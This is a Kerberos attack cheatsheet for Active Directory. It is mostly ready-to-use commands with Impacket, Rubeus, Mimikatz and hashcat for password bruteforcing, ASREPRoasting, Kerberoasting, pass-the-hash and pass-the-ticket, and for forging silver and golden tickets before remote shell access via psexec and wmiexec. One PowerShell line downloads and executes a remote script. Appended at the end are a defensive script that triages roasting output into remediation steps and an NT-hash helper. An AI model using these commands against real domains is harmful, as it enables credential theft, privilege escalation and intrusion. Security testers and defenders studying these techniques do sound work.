# Kerberos cheatsheet

## Bruteforcing

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):

```shell
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:

```shell
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

## ASREPRoast

With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py:

```shell
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

With [Rubeus](https://github.com/GhostPack/Rubeus):

```shell
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
```

Cracking with dictionary of passwords:

```shell
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>
```

## Kerberoasting

With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py:

```shell
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
```

With [Rubeus](https://github.com/GhostPack/Rubeus):

```shell
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
```

With **Powershell**:

```powershell
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
```

Cracking with dictionary of passwords:

```shell
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
```

## Overpass The Hash/Pass The Key (PTK)

By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```shell
# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

# Request the TGT with aesKey (AES is the encryption type Windows uses by default,
# so it is more secure and probably stealthier than RC4)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

# Request the TGT with password (if not provided, the password is asked for)
python getTGT.py <domain_name>/<user_name>:[password]

# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```shell
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Pass The Ticket (PTT)

### Harvest tickets from Linux

Check type and location of tickets:

```shell
grep default_ccache_name /etc/krb5.conf
```

If nothing is returned, the default is `FILE:/tmp/krb5cc_%{uid}`.

In case of file tickets, you can copy-paste them (if you have permissions) to use them.

In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```shell
# To dump current user tickets; if root, try to dump them all by injecting in other user processes
# To inject, copy tickey to a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i
```

### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```shell
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell:

```shell
.\Rubeus.exe dump

# After the dump, Rubeus prints the tickets in base64; to write one to a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
```

To convert tickets between Linux/Windows format with [ticket_converter.py](https://github.com/Zer1t0/ticket_converter):

```shell
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
```

### Using ticket in Linux

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```shell
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

### Using ticket in Windows

Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```shell
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```shell
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```shell
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Silver ticket

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```shell
# To generate the TGS with NTLM
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# To generate the TGS with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGS
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```shell
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with AES 256 key (AES is the encryption type Windows uses by default,
# so it is more secure and probably stealthier than RC4)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# Inject TGS with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```shell
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```shell
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Golden ticket

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```shell
# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# To generate the TGT with AES key
python ticketer.py -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```shell
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

# To generate the TGT with AES 256 key (AES is the encryption type Windows uses by default,
# so it is more secure and probably stealthier than RC4)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

# Inject TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```shell
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```shell
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Misc

To get the NTLM (NT) hash from a password, which is MD4 over the UTF-16LE encoding:

```shell
# Note: on Python builds linked against OpenSSL 3 without the legacy provider, hashlib has no "md4"
python3 -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest()).decode())'
```

## Tools

* [Impacket](https://github.com/SecureAuthCorp/impacket)
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
* [Rubeus](https://github.com/GhostPack/Rubeus)
* [Rubeus](https://github.com/Zer1t0/Rubeus) with brute module
* [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec)
* [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute)
* [tickey](https://github.com/TarlogicSecurity/tickey)
* [ticket_converter.py](https://github.com/Zer1t0/ticket_converter)
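The ASREPRoast and Kerberoasting sections produce hashcat-format files (modes 18200 and 13100) that a defender can read directly to see which accounts are exposed. The following is an added example, not part of the original cheatsheet: it parses those lines and lists each account with its encryption type and the fix; the sample lines are constructed with truncated ciphertext, and the layout assumed for AES (etype 17/18) ticket lines is a best-effort assumption.

```python
import re

# Added example (not from the cheatsheet): triage the hashcat-format output of
# GetNPUsers.py / Rubeus asreproast (mode 18200) and GetUserSPNs.py / Rubeus
# kerberoast / Invoke-Kerberoast (mode 13100). SAMPLE is constructed, ciphertext truncated.
ASREP_RE = re.compile(r"^\$krb5asrep\$(?:(\d+)\$)?([^@$]+)@([^:]+):([0-9a-f]+)\$([0-9a-f]+)$", re.I)

SAMPLE = """\
$krb5asrep$23$jdoe@corp.local:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/db01.corp.local:1433*$0f6dc2a1b3c4d5e6f708192a3b4c5d6e$9a8b7c6d5e4f
$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$aabbccddeeff00112233445566778899$00ff11ee22dd
not a roast line
"""


def parse_line(line):
    """Return {'kind','user','realm','etype','spn'} for one output line, or None."""
    line = line.strip()
    m = ASREP_RE.match(line)
    if m:  # AS-REP: $krb5asrep$23$user@REALM:checksum$edata (etype omitted in john format)
        etype = int(m.group(1)) if m.group(1) else 23
        return {"kind": "asrep", "user": m.group(2), "realm": m.group(3).upper(),
                "etype": etype, "spn": None}
    if line.startswith("$krb5tgs$"):
        # etype 23: $krb5tgs$23$*user$REALM$spn*$checksum$edata (Impacket and Rubeus).
        # AES lines (17/18) are assumed to carry user, realm, then *spn*.
        # A '$' inside a user name or SPN would break this split.
        f = line.split("$")
        if len(f) < 7 or not f[2].isdigit():
            return None
        spn = f[5].strip("*") if "*" in f[5] else None
        return {"kind": "tgs", "user": f[3].lstrip("*"), "realm": f[4].upper(),
                "etype": int(f[2]), "spn": spn}
    return None


def findings(text):
    """Deduplicated, sorted (realm, user, kind, etype, spn, fix) tuples."""
    out = set()
    for rec in filter(None, map(parse_line, text.splitlines())):
        if rec["kind"] == "asrep":
            fix = "re-enable Kerberos pre-authentication on the account"
        elif rec["etype"] == 23:
            fix = "RC4 TGS issued: rotate to a long random password or gMSA and enforce AES"
        else:
            fix = "AES TGS issued: confirm password length and rotation policy"
        out.add((rec["realm"], rec["user"], rec["kind"], rec["etype"], rec["spn"], fix))
    return sorted(out)


if __name__ == "__main__":
    for row in findings(SAMPLE):
        print(*row, sep=" | ")
```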
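The one-liner in the Misc section depends on OpenSSL exposing MD4, which Python builds on OpenSSL 3 frequently do not. This added example (not part of the original cheatsheet; the function names are my own) computes the same NT hash and falls back to a pure-Python MD4 (RFC 1320) when `hashlib` rejects `"md4"`.

```python
import hashlib
import struct

# Added example (not from the cheatsheet): NT hash = MD4(UTF-16LE(password)),
# with a pure-Python MD4 fallback for Python builds whose OpenSSL lacks md4.
_MASK = 0xFFFFFFFF
_R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)  # round 2 word order
_R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)  # round 3 word order


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(msg: bytes) -> bytes:
    """MD4 digest of msg (RFC 1320); correct for any length, slow for bulk use."""
    bit_len = len(msg) * 8
    msg = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:    # round 1: F(b,c,d), word i, no additive constant
                f, k, s = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4]
            elif i < 32:  # round 2: G(b,c,d) + sqrt(2) constant
                f, k, s = ((b & c) | (b & d) | (c & d)) + 0x5A827999, _R2[i - 16], (3, 5, 9, 13)[i % 4]
            else:         # round 3: H(b,c,d) + sqrt(3) constant
                f, k, s = (b ^ c ^ d) + 0x6ED9EBA1, _R3[i - 32], (3, 9, 11, 15)[i % 4]
            # each step updates one register, then the roles rotate (ABCD -> DABC -> ...)
            a, b, c, d = d, _rotl((a + f + x[k]) & _MASK, s), b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """Lowercase hex NT hash, the value the cheatsheet's Misc one-liner prints."""
    data = password.encode("utf-16le")
    try:
        return hashlib.new("md4", data).hexdigest()
    except ValueError:  # "unsupported hash type md4": OpenSSL 3 without the legacy provider
        return md4(data).hex()


if __name__ == "__main__":
    print(nt_hash("password"))  # 8846f7eaee8fb117ad06bdd830b7586c
```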